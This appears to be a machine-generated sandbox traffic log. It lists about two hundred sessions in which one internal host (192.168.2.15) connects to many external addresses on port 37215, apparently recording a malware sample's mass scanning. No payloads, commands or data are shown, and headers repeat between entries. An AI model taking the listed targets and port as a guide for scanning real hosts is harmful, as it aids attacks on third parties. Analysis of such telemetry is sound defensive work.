                                                                            20158192.168.2.1548248156.69.173.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20159192.168.2.1541894156.0.148.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20160192.168.2.1557978156.7.236.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20161192.168.2.1556562156.66.230.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20162192.168.2.1555056156.3.155.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20163192.168.2.1544182156.246.235.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20164192.168.2.1534796156.213.134.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20165192.168.2.1557366156.66.251.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20166192.168.2.1543932156.185.94.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20167192.168.2.1550136156.235.112.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20168192.168.2.1533836156.5.221.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20169192.168.2.1549520156.66.226.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20170192.168.2.1539422156.138.86.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20171192.168.2.1540324156.79.94.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20172192.168.2.1545154156.203.212.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20173192.168.2.1548340156.180.124.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20174192.168.2.1556124156.62.107.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20175192.168.2.1535148156.59.82.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20176192.168.2.1543282156.105.108.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20177192.168.2.1558814156.195.98.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20178192.168.2.1542158156.158.182.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20179192.168.2.1548754156.60.196.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20180192.168.2.1555996156.39.147.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20181192.168.2.1533362156.204.88.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20182192.168.2.1540846156.208.175.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20183192.168.2.1543878156.72.80.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20184192.168.2.1549260156.206.97.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20185192.168.2.1555774156.56.192.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20186192.168.2.1543168156.129.1.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20187192.168.2.1540124156.181.12.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20188192.168.2.1540350156.83.217.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20189192.168.2.1543296156.140.11.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20190192.168.2.1534164156.162.97.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20191192.168.2.1546918156.33.153.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20192192.168.2.1559012156.34.37.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20193192.168.2.1554950156.16.223.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20194192.168.2.1534908156.237.253.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20195192.168.2.1533992156.89.235.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20196192.168.2.1534418156.9.212.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20197192.168.2.1538946156.145.229.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20198192.168.2.1534320156.61.192.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20199192.168.2.1532864156.199.105.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20200192.168.2.1557102156.254.144.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20201192.168.2.1554164156.41.242.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20202192.168.2.1554710156.23.0.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20203192.168.2.1560954156.202.84.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20204192.168.2.1560708156.103.157.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20205192.168.2.1543960156.141.165.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20206192.168.2.1555224156.57.38.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20207192.168.2.1542352156.144.129.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20208192.168.2.1544456156.26.127.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20209192.168.2.1555482156.179.116.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20210192.168.2.1545458156.37.233.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20211192.168.2.1536792156.114.120.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20212192.168.2.1550638156.166.109.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20213192.168.2.1532888156.159.187.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20214192.168.2.1544988156.88.220.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20215192.168.2.1553760156.38.45.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20216192.168.2.1556498156.174.231.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20217192.168.2.1536256156.191.230.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20218192.168.2.1554270156.61.175.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20219192.168.2.1536386156.20.117.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20220192.168.2.1548372156.11.234.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20221192.168.2.1560050156.156.146.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20222192.168.2.1538890156.86.7.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20223192.168.2.1545848156.96.74.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20224192.168.2.1544176156.45.95.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20225192.168.2.1541054156.63.240.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20226192.168.2.1550136156.238.221.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20227192.168.2.1539890156.32.47.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20228192.168.2.1533250156.51.231.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20229192.168.2.1540866156.174.105.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20230192.168.2.1542458156.167.36.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20231192.168.2.1554042156.182.207.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20232192.168.2.1560646156.116.119.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20233192.168.2.1559312156.133.236.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20234192.168.2.1538228156.181.41.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20235192.168.2.1538492156.88.183.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20236192.168.2.1555312156.175.36.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20237192.168.2.1540374156.234.195.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20238192.168.2.1551480156.103.199.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20239192.168.2.1544272156.35.28.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20240192.168.2.1548032156.129.202.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20241192.168.2.1547448156.38.78.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20242192.168.2.1556624156.170.255.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20243192.168.2.1549106156.161.211.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20244192.168.2.1550136156.54.122.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20245192.168.2.1533224156.84.144.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20246192.168.2.1550246156.254.18.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20247192.168.2.1559750156.14.23.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20248192.168.2.1552576156.129.30.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20249192.168.2.1559424156.179.81.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20250192.168.2.1555558156.5.3.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20251192.168.2.1555682156.70.184.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20252192.168.2.1557336156.101.115.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20253192.168.2.1546518156.65.124.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20254192.168.2.1534746156.173.84.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20255192.168.2.1534688156.56.193.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20256192.168.2.1548444197.98.21.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20257192.168.2.1534234197.122.48.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20258192.168.2.1559652197.167.128.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20259192.168.2.1558770197.87.131.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20260192.168.2.1533514197.248.91.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20261192.168.2.1540410197.145.201.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20262192.168.2.1535606197.220.61.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20263192.168.2.1540800197.209.135.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20264192.168.2.1560166197.24.88.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20265192.168.2.1554636197.100.52.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20266192.168.2.1552410197.163.110.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20267192.168.2.1542028197.190.19.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20268192.168.2.1539444197.153.130.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20269192.168.2.1546124197.244.31.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20270192.168.2.1538310197.217.182.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20271192.168.2.1551830197.112.180.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20272192.168.2.1533762197.76.53.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20273192.168.2.1554258197.143.194.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20274192.168.2.1548974197.107.206.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20275192.168.2.1543722197.152.119.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20276192.168.2.1559946197.130.118.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20277192.168.2.1550880197.25.55.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20278192.168.2.1540666197.188.14.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20279192.168.2.1548304197.163.6.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20280192.168.2.1549238197.2.31.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20281192.168.2.1559214197.3.70.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20282192.168.2.1535768197.236.57.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20283192.168.2.1536150197.131.186.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20284192.168.2.1535420197.51.249.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20285192.168.2.1555890197.173.88.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20286192.168.2.1560544197.60.106.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20287192.168.2.1552990197.95.168.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20288192.168.2.1535926197.70.91.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20289192.168.2.1543934197.83.56.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20290192.168.2.1537156197.5.92.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20291192.168.2.1549662197.26.167.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20292192.168.2.1552572197.172.187.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20293192.168.2.1553820197.240.230.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20294192.168.2.1548968197.111.131.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20295192.168.2.1557428197.17.201.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20296192.168.2.1533770197.131.190.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20297192.168.2.1533806197.212.211.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20298192.168.2.1546366197.172.156.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20299192.168.2.1539970197.178.162.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20300192.168.2.1552260197.21.128.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20301192.168.2.1559050197.31.163.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20302192.168.2.1558816197.11.42.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20303192.168.2.1545734197.205.248.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20304192.168.2.1553098197.43.209.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20305192.168.2.1545110197.166.219.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20306192.168.2.1539740197.184.14.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20307192.168.2.1541078197.183.193.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20308192.168.2.1557992197.0.80.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20309192.168.2.1540198197.63.178.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20310192.168.2.1550848197.212.118.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20311192.168.2.1549394197.245.138.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20312192.168.2.1533228197.219.32.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20313192.168.2.1539906197.132.235.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20314192.168.2.1547226197.230.102.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20315192.168.2.1538318197.31.243.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20316192.168.2.1558212197.113.153.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20317192.168.2.1542556197.242.19.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20318192.168.2.1534546197.195.83.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20319192.168.2.1553788197.128.145.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20320192.168.2.1549042197.114.211.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20321192.168.2.1546776197.177.129.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20322192.168.2.1539228197.251.191.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20323192.168.2.1555228197.228.63.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20324192.168.2.1541106197.27.90.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20325192.168.2.1536934197.172.247.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20326192.168.2.1559770197.195.42.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20327192.168.2.1559648197.129.76.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20328192.168.2.1532894197.124.222.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20329192.168.2.1532860197.76.251.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20330192.168.2.1559638197.53.78.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20331192.168.2.1537090197.14.115.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20332192.168.2.1553800197.95.217.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20333192.168.2.1558754197.162.165.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20334192.168.2.1539998197.152.240.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20335192.168.2.1545804197.209.134.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20336192.168.2.1542554197.72.195.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20337192.168.2.1548364197.78.214.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20338192.168.2.1551146197.105.13.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20339192.168.2.1554132197.59.144.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20340192.168.2.1547470197.40.31.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20341192.168.2.1555240197.59.72.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20342192.168.2.1540040197.47.16.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20343192.168.2.1536112197.143.17.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20344192.168.2.1540346197.14.130.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20345192.168.2.1532820197.226.238.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20346192.168.2.1559692197.62.233.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20347192.168.2.1550980197.79.168.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20348192.168.2.1556086197.129.76.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20349192.168.2.1553628197.14.25.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20350192.168.2.1536506197.177.129.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20351192.168.2.1533394197.108.13.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20352192.168.2.1557360197.3.87.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20353192.168.2.1544192197.128.163.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20354192.168.2.1556732197.223.77.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20355192.168.2.1554026197.245.67.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20356192.168.2.1534718197.68.173.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20357192.168.2.1536118197.212.43.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
